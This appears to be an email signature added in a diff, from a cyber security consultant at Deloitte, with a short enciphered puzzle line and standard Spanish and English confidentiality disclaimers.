+******************************************************************************
+ 
+Fara Rustein | Senior Consultant
+Cyber Security - Deloitte
+The key is searching. Vs nfv zphz qsui ghzf zg xhv yvzqy gj tiwap.
+
+ 
+Deloitte se refiere a una o más de las firmas miembros de Deloitte Touche Tohmatsu Limited, una compañía privada del Reino Unido limitada por garantía, y su red de firmas miembros, cada una como una entidad única e independiente y legalmente separada. Una descripción detallada de la estructura legal de Deloitte Touche Tohmatsu Limited y sus firmas miembros puede verse en el sitio web http://www.deloitte.com/about.                           La información de este mail es confidencial y concierne únicamente a la persona a quien está dirigida. Si este mensaje no está dirigido a usted, por favor tenga presente que no tiene autorización para leer el resto de este e-mail, copiarlo o derivarlo a cualquier otra persona que no sea aquella a quien está dirigido. Si recibe este mail por error, por favor, avise al remitente, luego de lo cual rogamos a usted destruya el mensaje original. No se puede responsabilizar de ningún modo a Deloitte & Co. S.A. ni a sus subsidiarias por cualquier consecuencia o daño que pueda resultar del apropiado y completo envío y recepción del contenido de este e-mail.
+ 
+Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee, and its network of member firms, each of which is a legally separate and independent entity. Please see http://www.deloitte.com/about for a detailed description of the legal structure of Deloitte Touche Tohmatsu Limited and its member firms. 
+The information in this e-mail is confidential and intended solely for the person to whom it is addressed. If this message is not addressed to you, please be aware that you have no authorization to read the rest of this e-mail, to copy it or to furnish it to any person other than the addressee. Should you have received this e-mail by mistake, please bring this to the attention of the sender, after which you are kindly requested to destroy the original message. Deloitte & Co. S.A. and subsidiaries cannot be held responsible or liable in any way whatsoever for and/or in connection with any consequences and/or damage resulting from the proper and complete dispatch and receipt of the content of this e-mail.